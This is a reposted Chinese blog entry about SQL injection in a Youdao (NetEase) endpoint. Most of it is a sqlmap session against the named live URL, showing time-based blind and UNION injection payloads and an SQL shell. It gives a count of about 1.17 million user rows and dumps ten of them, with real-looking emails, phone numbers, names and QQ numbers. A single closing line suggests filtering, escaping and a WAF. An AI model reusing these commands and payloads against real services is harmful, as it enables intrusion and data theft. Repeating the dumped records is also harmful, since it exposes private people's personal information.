网易某站点SQL注入影响百万用户信息
程序员文章站
2022-04-07 19:34:30
$ python sqlmap.py -u "https://f.youdao.com/file.do?method=getMajorName&subject...
$ python sqlmap.py -u "https://f.youdao.com/file.do?method=getMajorName&subject=undefined*" --sql-shell _ ___ ___| |_____ ___ ___ {1.0.3.9#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:19:31 custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [12:19:33] [INFO] resuming back-end DBMS 'mysql' [12:19:33] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' AND (SELECT * FROM (SELECT(SLEEP(5)))wyCV) AND 'UlJS'='UlJS Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' UNION ALL SELECT NULL,CONCAT(0x716a766a71,0x686f634c42577a794d7447684b6b796e51566255644e6f58714b6e527568574b4d786f536a50426d,0x7170717a71),NULL,NULL-- - --- [12:19:33] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.12 [12:19:33] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> select count(*) from user_online [12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online' [12:20:00] [WARNING] reflective value(s) found and filtering out select count(*) from user_online: '1171117' sql-shell> select * from user_online limit 10 [12:20:49] [INFO] fetching SQL SELECT statement query output: 'select * from user_online limit 10' [12:20:49] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself [12:20:49] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns [12:20:49] [INFO] fetching current database [12:20:49] [INFO] fetching columns for table 'user_online' in database 'atranslate' [12:20:49] [INFO] the query with expanded column name(s) is: SELECT amount, createTime, email, id, info, trialAmount, username FROM user_online LIMIT 10 [12:20:49] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s) [12:20:49] [INFO] retrieved: "0","1421038640911","[email protected]","-9223371666268699366","{\\"phone\\":\\"13849737026\\... [12:20:49] [INFO] retrieved: "0","1441078075986"," ","-9223365685474998611","{\\"vendor\\":\\"write\\"}","0","kuang.xiaoyan@... [12:20:50] [INFO] retrieved: "0","1456906495294"," ","-9223339392571530192","{\\"vendor\\":\\"read\\"}","0","[email protected].. [12:20:50] [INFO] retrieved: "0","1420706540215"," ","-9223331508831089524","{\\"vendor\\":\\"write\\"}","0","[email protected].. [12:20:50] [INFO] retrieved: "0","1458184084774"," ","-9223323061235546606","{\\"vendor\\":\\"weixinapp\\"}","0","opWGrjrDDK... [12:20:50] [INFO] retrieved: "0","1422687949837"," ","-9223299177461494054","{\\"vendor\\":\\"write\\"}","0","carrie_chicos@... [12:20:50] [INFO] retrieved: "0","1433299378884"," ","-9223294631254944376","{\\"vendor\\":\\"write\\"}","0","[email protected]... [12:20:50] [INFO] retrieved: "0","1433410028488","[email protected]","-9223283068763516084","{\\"phone\\":\\"13924952418\\",\\... [12:20:50] [INFO] retrieved: "0","1457073582194"," ","-9223281766783387951","{\\"vendor\\":\\"write\\"}","0","[email protected]... [12:20:50] [INFO] retrieved: "0","1440489549781"," ","-9223261311899849978","{\\"vendor\\":\\"write\\"}","0","[email protected]" select * from user_online limit 10 [10]: [*] 0, 1421038640911, [email protected], -9223371666268699366, {\"phone\":\"13849737026\",\"bill\":null,\"nickname\":\"Bonnie\",\"vendor\":\"fanyiinput\",\"name\":\"陈秀\",\"qq\":\"792684076\"}, 0, qq_F516AC4A2C032277B0BECE2E5FA8EEF0 [*] 0, 1441078075986, , -9223365685474998611, {\"vendor\":\"write\"}, 0, [email protected] [*] 0, 1456906495294, , -9223339392571530192, {\"vendor\":\"read\"}, 0, [email protected] [*] 0, 1420706540215, , -9223331508831089524, {\"vendor\":\"write\"}, 0, [email protected] [*] 0, 1458184084774, , -9223323061235546606, {\"vendor\":\"weixinapp\"}, 0, opWGrjrDDKLQ7kKG4-4KGEBlKsYs [*] 0, 1422687949837, , -9223299177461494054, {\"vendor\":\"write\"}, 0, [email protected] [*] 0, 1433299378884, , -9223294631254944376, {\"vendor\":\"write\"}, 0, [email protected] [*] 0, 1433410028488, [email protected], -9223283068763516084, {\"phone\":\"13924952418\",\"nickname\":\"☆心B\\\/tp钟\",\"vendor\":\"connect.qq.com\"}, 0, qq_E58B42699858FC01548B79B25230D4A2 [*] 0, 1457073582194, , -9223281766783387951, {\"vendor\":\"write\"}, 0, [email protected] [*] 0, 1440489549781, , -9223261311899849978, {\"vendor\":\"write\"}, 0, [email protected]
sql-shell> select count(*) from user_online [12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online' [12:20:00] [WARNING] reflective value(s) found and filtering out select count(*) from user_online: '1171117' 1171117位用户的数据,还挺顺口的。
解决方案:
过滤,转义,加waf。
上一篇: 【计算机网络】计算机网络面试题系列二
下一篇: IPC进程间通信